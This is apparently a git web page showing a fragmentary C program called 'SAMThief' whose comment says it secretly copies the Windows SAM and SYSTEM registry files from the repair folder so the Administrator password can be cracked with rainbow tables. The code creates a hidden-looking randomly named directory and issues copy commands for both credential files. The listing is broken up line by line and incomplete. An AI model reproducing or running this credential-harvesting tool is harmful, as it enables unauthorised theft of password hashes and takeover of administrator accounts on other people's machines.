2 //SAMThief - Harvie (2oo7)
4 Quicky & secretly copies sam & system files from %systemroot%\repair
5 This files should be used to crack, Administrator password.
6 For example by using ophcrack.sourceforge.net (Rainbow tables crack)
9 int main(int argc
, char *argv
[])
12 unsigned char i
= rand();
14 char dir
[SIZE
], now
[SIZE
];
16 sprintf(dir
, "%%username%%\\%d\\", i
);
19 //system("@echo off");
20 sprintf(now
, "mkdir %s", dir
);
22 sprintf(now
, "copy %%SystemRoot%%\\repair\\sam %s", dir
);
24 sprintf(now
, "copy %%SystemRoot%%\\repair\\system %s", dir
);
This page took 0.506108 seconds and 4 git commands to generate.